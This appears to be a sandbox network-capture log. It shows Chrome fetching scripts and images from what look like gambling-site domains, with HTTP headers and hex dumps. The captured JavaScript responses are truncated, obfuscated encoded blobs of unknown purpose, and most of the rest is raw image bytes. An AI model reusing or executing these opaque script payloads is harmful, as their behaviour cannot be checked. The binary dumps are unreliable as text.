                                                                                                                                                          2024-06-09 22:41:21 UTC8744INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 44 67 45 34 42 64 41 47 67 47 38 41 68 45 41 46 77 42 6b 41 75 41 4d 77 46 63 30 59 61 42 4c 64 54 4a 55 6d 67 4a 54 6b 41 76 71 52 69 55 41 61 70 57 5a 73 4f 33 4e 4c 33 36 6b 30 51 67 45 51 73 6b 49 41 41 52 49 61 41 4a 30 34 64 56 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 4a 70 7a 51 67 41 43 6e 70 51 51 51 65 6d 67 45 39 4d 4e 4b 53 71 41 50 72 42 49 45 67 41 73 69 68 32 4c 41 41 32 49 4b 6f 55 41 47 35 51 73 53 77 67 44 41 43 45 41 41 7a 43 41 73 59 70 65 6c 6f 67 41 4c 77 4b 71 67 43 32 53 51 41 53 41 49 71 71 41 71 53 63 5a 54 59 4b 49 49 30 6f 5a 5a 69 71 41 43 4a 32 2b 4d 41 4e 70 4d 41 74 43 69 69 4e 65 6c 32 71 32 5a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2Z


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          616192.168.2.55040690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC569OUTGET /pc/240516-03/static/js/components/125/views/home/indexView.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 748
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:02 GMT
                                                                                                                                                          ETag: "6645ca5e-2ec"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE27[4],EU-FRA-paris-GLOBAL1-CACHE4[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063155
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 7c8cbd2e48e8213ebf6e109d6807ccef
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528845
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC748INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 42 67 47 5a 43 42 64 41 47 67 47 38 77 41 58 41 4c 77 46 6b 41 75 41 4d 77 46 63 30 5a 71 42 4c 64 54 45 4d 74 47 57 6f 42 4b 43 67 43 4a 57 53 45 41 41 49 6b 31 41 45 35 64 4f 59 67 4e 77 42 35 4d 41 43 73 51 6e 41 48 51 41 54 45 4d 79 35 6f 51 41 42 58 6b 6f 49 49 65 64 51 43 65 6d 51 57 49 44 36 7a 6b 45 6e 6f 70 39 72 41 44 59 67 78 6c 41 42 75 55 44 36 73 49 49 77 41 68 50 67 41 76 73 49 71 31 4a 68 69 2b 46 78 6d 41 42 5a 69 77 6b 4b 4a 2b 44 41 51 7a 42 6b 71 77 66 4c 53 58 41 43 38 46 44 41 6f 41 4c 59 51 36 43 42 6f 31 45 69 4d 46 4e 46 6b 2b 6c 44 55 55 43 7a 73 6e 44 78 6f 6d 4b 4c 79 49 4e 53 73 38 6d 67 55 4a 6f 59 41 48 67
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgGZCBdAGgG8wAXALwFkAuAMwFc0ZqBLdTEMtGWoBKCgCJWSEAAIk1AE5dOYgNwB5MACsQnAHQATEMy5oQABXkoIIedQCemQWID6zkEnop9rADYgxlABuUD6sIIwAhPgAvsIq1Jhi+FxmABZiwkKJ+DAQzBkqwfLSXAC8FDAoALYQ6CBo1EiMFNFk+lDUUCzsnDxomKLyINSs8mgUJoYAHg


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          617192.168.2.55040790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC554OUTGET /pc/240516-03/static/js/components/noticeBox.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7648
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          ETag: "6645cace-1de0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE2[350],EU-GER-frankfurt-GLOBAL1-CACHE10[346,TCP_MISS,349],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 005549c7f56955394498f011fab46806
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823400
                                                                                                                                                          X-CCDN-Expires: 768615
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC7648INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 44 67 42 59 41 61 51 67 5a 67 45 59 42 64 59 67 62 77 43 49 4b 41 32 58 46 65 67 4c 67 44 4d 42 58 4e 47 41 46 77 43 57 36 54 50 32 49 68 69 67 67 4a 53 31 2b 41 4f 68 41 41 50 43 43 67 42 4f 2f 4a 41 46 35 42 6d 65 6f 51 43 63 6e 41 4b 72 30 70 6d 43 68 53 6b 42 66 59 76 56 77 41 35 4d 41 48 6b 4f 50 50 6b 4a 46 69 51 4d 6d 2f 51 44 73 41 47 71 4b 41 41 71 75 76 41 4c 43 61 4b 4c 69 50 72 62 36 66 67 6a 36 59 65 36 52 30 52 4c 53 44 4e 78 49 49 41 41 45 53 50 79 71 67 67 4c 30 41 4e 78 4f 59 41 42 57 49 41 4a 79 41 43 59 67 6e 49 4a 6f 49 4d 47 71 4b 42 41 67 36 67 43 65 6d 42 4c 30 41 50 72 39 49 45 67 41 73 69 69 31 33 41 41 32 49 50
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          618192.168.2.55035538.174.148.164434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC345OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: 43370d.top
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:22 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:22 UTC29INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=1800
                                                                                                                                                          2024-06-09 22:41:22 UTC21INData Raw: 45 54 61 67 3a 20 22 35 62 33 33 35 34 61 65 2d 38 63 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "5b3354ae-8c"
                                                                                                                                                          2024-06-09 22:41:22 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.2
                                                                                                                                                          2024-06-09 22:41:22 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          2024-06-09 22:41:22 UTC28INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/x-icon
                                                                                                                                                          2024-06-09 22:41:22 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 37 20 4a 75 6e 20 32 30 31 38 20 30 39 3a 31 31 3a 31 30 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          2024-06-09 22:41:22 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:22 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                                                                                                                          Data Ascii: Accept-Ranges: bytes


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          619192.168.2.55040347.246.46.2224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC563OUTGET /ocs/cc.png?1717972879159 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://43370d.top
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://43370d.top/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC421INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache35.l2hk3[6,0], cache13.l2in1[144,0], ens-cache14.it4[453,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: 2ff62ea217179728817021392e
                                                                                                                                                          2024-06-09 22:41:22 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          620192.168.2.55041023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC645OUTGET /pc/image-pc/index/382/slot/10082.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC619INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 17624
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 09:05:19 GMT
                                                                                                                                                          ETag: "64c0e1cf-44d8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[13],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,12],EU-FRA-paris-GLOBAL1-CACHE22[4],EU-FRA-paris-GLOBAL1-CACHE15[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473790
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a07fdde4e43b25bab3b98c743752a3ae
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118210
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15765INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 07 00 00 01 06 08 06 00 00 00 68 f7 50 02 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDRhPtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4
                                                                                                                                                          2024-06-09 22:41:21 UTC1859INData Raw: 30 0d dd 9b c3 e4 8c 3a 78 29 d9 71 ca a6 50 5c 3d 65 6d 28 a9 e0 88 40 96 09 ff fa 9e 5a bb 4a 2b 29 f0 6a 7d 49 e6 02 65 56 b6 e3 c2 a3 ba 21 94 4d a9 00 d2 19 88 7e c0 72 88 cc 35 16 82 6c a9 98 53 d8 98 19 63 af 62 32 b1 30 5c 8b b6 6e 09 0d aa ad e0 9c 26 40 6a 2f 0c d5 ff cc 92 9c b2 ee 4e 2d 14 f5 4a 94 0a 55 a4 ba e9 ea 2c b3 50 11 7c ca b3 76 5d 0e 04 b0 bb d4 fd 6c ed b2 73 66 49 7c 29 d9 8b aa 39 14 ff 46 91 d2 99 d5 a2 36 6a 71 c0 17 17 2d 67 74 61 99 d6 43 e5 ba ac 1d 60 04 1e 46 d6 9d da 37 54 b9 6f d6 18 a8 ae 58 44 c0 5e 4b 7c de 4d d5 67 d5 96 4a a1 99 0b c2 67 73 e2 44 5e d0 3a 55 58 d3 90 5b af 46 78 d4 b9 3c 10 ad 70 e8 d0 d5 6e c8 8a 99 1c 49 35 87 8a 1c 21 db 2a dd bb 62 01 a1 e4 1f 37 56 ed d6 88 28 b9 fa 4c 30 2b a9 cb 2a 3f a5 02
                                                                                                                                                          Data Ascii: 0:x)qP\=em(@ZJ+)j}IeV!M~r5lScb20\n&@j/N-JU,P|v]lsfI|)9F6jq-gtaC`F7ToXD^K|MgJgsD^:UX[Fx<pnI5!*b7V(L0+*?


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          621192.168.2.55041190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC608OUTGET /pc/image-pc/index/312/nav/lottery/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 71418
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:49 GMT
                                                                                                                                                          ETag: "5d71fe81-116fa"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE6[3],EU-FRA-paris-GLOBAL1-CACHE15[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6784c442262b2f54d160be31a962edd1
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b0 00 00 00 b7 08 06 00 00 00 b2 b2 d4 e6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 67 b0 65 59 76 1e 06 7e 6b 9b e3 ae bf cf fb f4 be b2 b2 4c 96 ed ee ea ae 76 e8 06 1a 00 01 50 02 0d 38 20 47 20 29 88 94 14 12 63 a8 99 d1 90 60 30 14 12 19 e2 04 49 c5 48 a4 40 01 a2 40 10 24 48 a0 d1 00 1a 6d 50 5d d5 65 b3 ab b2 aa b2 d2 7b f3 fc bb ef 7a 77 ec 36 f3 e3 be 97 95 55 5d 6d 40 8c 28 05 39 3b e3 e4 7d f7 b8 7b ef 39 df 5e e7 db 6b 7d 6b 6d b2 d6 72 fc fb d8 ec 87 de d3 e8 c5
                                                                                                                                                          Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDCIDATxgeYv~kLvP8 G )c`0IH@@$HmP]e{zw6U]m@(9;}{9^k}kmr
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 41 18 63 72 61 16 c7 8e 1c c6 da ca 32 7e f2 4b 3f 8e 0c 84 34 55 68 b4 da 48 e2 0c f1 20 84 a2 26 28 3f 79 32 c7 f5 62 12 f7 ff be d2 fe a3 71 7f 78 80 c1 7c c5 10 02 6b e8 33 dd 30 9c b8 78 76 05 f5 64 80 f9 bd fb 10 0e 13 2c af 6f 21 4a 01 0f 29 c6 5d 0e 5e df 40 61 b0 8d 03 49 88 c5 ce 2a aa d1 10 3a 55 88 93 08 50 09 88 3b 60 c4 c1 84 84 cf 38 62 9d c1 53 06 f5 ad 06 fe f9 af fc 73 d4 6b 75 18 66 c0 24 8d 78 99 e4 30 a9 42 96 24 18 0e 07 b0 8c 20 1d 0f ae eb 63 65 65 1d 7c 27 b2 93 a9 0c ca 68 08 d7 81 c9 14 ac b5 28 95 4a 88 c3 04 81 ef 02 c6 c0 a8 0c bd e1 00 20 03 e6 4a 8c f2 b3 2d 04 34 04 2c b6 b7 b6 50 75 66 10 78 1e ee 2d 2f e3 37 7f e3 9f a1 db ac a1 dd ae a3 3a 3d 8e 73 57 ae 80 17 2a 58 3c 36 84 af 13 4c e7 81 4b 37 2f f0 87 f6 1f c2 78 b5
                                                                                                                                                          Data Ascii: Acra2~K?4UhH &(?y2bqx|k30xvd,o!J)]^@aI*:UP;`8bSskuf$x0B$ cee|'h(J J-4,Pufx-/7:=sW*X<6LK7/x
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: e7 67 4b 66 73 75 4f 65 61 8c 85 5c cb c2 b5 f2 4f 7c dc b3 58 5d 5a 9a d7 13 f0 e6 17 bf fa e2 bc 17 0c 53 af 72 da b8 81 a3 86 a3 2c f1 4b ae 70 15 a6 5a e1 5f 8d 22 81 53 f2 37 9c 6a 69 5c 9f f4 4f c5 31 79 1c c7 2f 35 9b cd ff d9 55 0e d2 f2 55 29 e5 d1 cc e4 9f 9a 28 95 e7 8e 1f 3f ee 5e b8 70 01 e5 4b b4 b5 ef a4 84 7e 5f 4e 87 a4 d8 7c ed 6e 6d 51 76 5d 6a 81 8f 23 32 94 49 78 f6 a9 67 38 73 62 91 c1 30 e1 e2 ea 6d d6 d7 d7 a8 57 2a 9c 38 72 94 bd ed 1d 46 dd 3e c7 8f 1c e5 da 85 4b 74 fa 1d ce bf fa 3a ca af 32 08 33 26 6a 3e ca 73 e9 51 63 5c 9a 21 d0 0e 6e 2e 60 a4 89 c7 29 be 76 10 56 21 ac 40 cb c2 0b c3 28 70 84 42 59 4b bf d7 a5 ec fa 04 9e 8f 90 85 c8 d0 c4 09 0d 37 a0 9c 68 a2 30 46 a6 19 22 4d 50 52 63 8c 61 30 18 30 18 0c 88 a3 02 ef 95
